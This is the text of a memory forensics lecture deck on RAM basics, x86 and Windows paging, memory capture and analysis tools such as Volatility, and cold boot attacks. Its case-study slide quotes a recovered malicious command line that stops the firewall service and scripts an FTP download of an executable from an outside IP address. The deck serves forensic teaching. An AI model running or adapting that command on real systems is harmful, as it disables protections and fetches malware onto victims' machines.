Se ha denunciado esta presentación.
Utilizamos tu perfil de LinkedIn y tus datos de actividad para personalizar los anuncios y mostrarte publicidad más relevante. Puedes cambiar tus preferencias de publicidad en cualquier momento.

Memory Forensics

Memory Forensics Presentation from one of my lectures. I have tried to explain the functioning of memory in 32 bit architecture, how paging works, how windows manage its memory pages and how memory forensics job is done. The forensics part focuses on collecting data and analyzing the same

  • Sé el primero en comentar

Memory Forensics

  1. 1. Shri Memory Forensics Boonlia Prince Komal Don’t pull the PlugGmail : boonlia@gmail.comFacebook:http://www.facebook.com/home.php?#!/profile.php?id=1701055902 or search for my mail id boonliasecurity@gmail.comTwitter: http://twitter.com/boonlia
  2. 2. Live/ Dead Memory Forensics• What is Live Memory and what is Dead Memory – RAM – Pagefile – Hibernation file Hard Drive Live Memory Forensics Where is Hibernation file?
  3. 3. Few Basics of RAM• A grid of Capacitors (DRAM)• Bucket with holes• Random Access• Parity Bit for error reporting
  4. 4. A Grid of Capacitors Row Select: Set to high for the related row Column Select: Set to high for related column Read write line set to high for read and low for write Data inflow or outflow depending upon the R/W stateAddress Bus: Carries the Address ofmemory locationData Bus: Carries the data in and outthrough the same wires (Read/Write busor simply Data Bus)
  5. 5. Bucket with whole (DRAM)Capacitors by their very naturegets discharged rapidlyAny read write operation adds tothese capacitors beingdischargedThis calls for regular refreshingwhere in the entire data is readand written backSRAM Uses transistors (2-4)per bit to show on or off stateper bit
  6. 6. Memory Address space Byte Addressable Memory (Reads 8 bits at a time)32 Bit Processor 64 Bit Processor2^32 2^644 GB 17 Billion GB 40 Bit implementation 50 Bit implementation 1024 GB 1024 TB
  7. 7. Memory management at a glance ProcessorMemory Manager Application DMA ?
  8. 8. Need For a Memory ManagerProtect Operating system and Kernel Memory SpacePrevent Application violations (Accessing otherapplications Memory)Allocate memory judiciouslyAllow Multiple applications to co-existsImprove Memory utilization efficiencyExtend the Memory capacity via swappingProvide Application a simpler platform to use memory(Virtual memory Space) You dont have to create twoprograms for 1 GB and 2 GB RAM machinesManaging the shared memory
  9. 9. User mode v/s kernel Mode• Memory protection• Location of both the modes in RAM• /3GB switch in boot.ini• Where the Page directory and Page Table entries are stored• What if User mode needs to access something in Kernel Mode
  10. 10. User Mode V/s Kernel Mode Memory
  11. 11. Kernel Mode Location of Page table and Page Directory User Mode4GB Space 4GB SpaceWithout With PAEPAE
  12. 12. Overview of Virtual Memory Managementon X86 Processor TLB Transaction lookaside buffer
  13. 13. Memory management in windowsWindows on 32 Bit X86 Architecture can accessupto 4 GB MemoryWindows can provide 4GB of memory spaceeach to multiprocesses despite the total memorybeing 4 GB maxThis is done by using the X86 feature calledpagingEvery Memory page is 4KB
  14. 14. Virtual memory to physical memory
  15. 15. The Paging Process in x86 processorImage source:technet.microsoft.com
  16. 16. Few Concepts in Windows Memory Management Process Memory Usage Counters Virtual Size Private Byte Counter Working Set Physical Memory (Say 1GB) Private Bytes Working SetVirtual 2 GBSize Shared Memory
  17. 17. Page lists in Windows (Dont confuse with page table) 1) Zero Page list Pages that carries no data and are ready to be assigned to a process 3) Free Page list Pages not being used by any process and free but still contains data 2) Standby Page list Unmodified Pages that are taken away from a process 4) Modified Page list Modified pages pertaining to a process taken away from that process
  18. 18. Windows Memory Management at a Glance Process Page Working set ve d File Modified a ded ns t a & N ee Page U a 1 M odified DBoot P ages List Sa ve d da ta Hard 2 Drive U nm o dified page s nee Zero d ed Standby Page 3 Me List mo List ry no lon g er n eed ed Free Page n List Exceeding memory use ormemory crunch situation in red font
  19. 19. Memory Management in OS• Memory Manager – Large address space - user programs can reference more memory than physically exists – Protection - the memory for a process is private and cannot be read or modified by another process; also, the memory manager prevents processes from overwriting code and read-only-data. – Memory Mapping - clients can map a file into an area of virtual memory and access the file as memory – Fair Access to Physical Memory - the memory manager ensures that processes all have fair access to the machines memory resources, thus ensuring reasonable system performance – Shared Memory - the memory manager allows processes to share some portion of their memory. For example, executable code is usually shared amongst processes.
  20. 20. What can be found in memory• The running processes• The Running threads• The passwords/ Keys and other information• Live registry hives• Live chats and login informations• Malware presence including rootkits• Open connections to the net / Network• Open Files and their remnants• .• .• In fact any thing that processor works upon
  21. 21. The Process of Memory forensics• Capture the memory• Analyze the memory• Reconstruction of the memory state• Reconstruction of the entire scenario with disk image and memory image in conjunction
  22. 22. Various formats• Raw Dump (Linear format) (.img/.dd)• Windows Crash dump format (.bin) – BSoD (Written after the system is frozen)• Hiberfil.sys format• Commercial tools format – Winen .E01 kind of format – .Vmem (Vmware) – .Bin (Hyper V) – Fastdump Pro (hpak)
  23. 23. Capturing the memory• Tools – DD / DCFLDD/ DC3DD • dd if=.PhysicalMemory of=f:memory.img – Memdump – Win32dd – Nigilant32 – Fastdump (Fastdump pro dumps page file content too) – MDD – Winen (Encase) – Memoryze (Dumps the pagefile content too) – Livekd.exe (From microsoft)
  24. 24. Brief demo on memory acquisition with win32dd
  25. 25. Hardware approach• Firewire port device (DMA) • http://www.storm.net.nz/projects/16• PCI Device by Brian Carrier and Joe Grand – Tribble Device
  26. 26. Analysing the memory dump• String search with strings.exe• Grep search with grep command• DFRWS 2005 (Memparser)• 2007: Aaron Walters- Volatility frmework• Several Plugins for Volatiltiy• Pdfbook, Pdgmail, Pdymail, Skypeeks• Memparser• Memoryzer and Audit Viewer
  27. 27. Volatility Framework What is volatility Volatility plugins Using volatility on memory dumps Demo with few options for analysis
  28. 28. Cold Boot Attack• Memory doesn’t gets empty that fast• Even after 30 Seconds to even minutes of system shutdown the memory contains data• This Time can be prolonged if the memory is cooled down. The coolant applied instantly reduce the temperature of -50
  29. 29. Case StudyShell C:windowssystem32cmd.exe /c net1 stopsharedaccess&echo open 111.67.192.11> cmd.txt&echochajian>> cmd.txt&echo 123>> cmd.txt&echobinary>>cmd.txt&echo get seo.exe>>…………..
  30. 30. Gmail : boonlia@gmail.com Facebook: http://www.facebook.com/home.php?#!/profile.php?id=1701055902 You can reach us at or search for my mail id boonliasecurity@gmail.com Twitter: http://twitter.com/#!/boonlia boonlia@gmail.com bhansalireena@gmail.comhttp://nullcon.netnullcon Goa 2010

×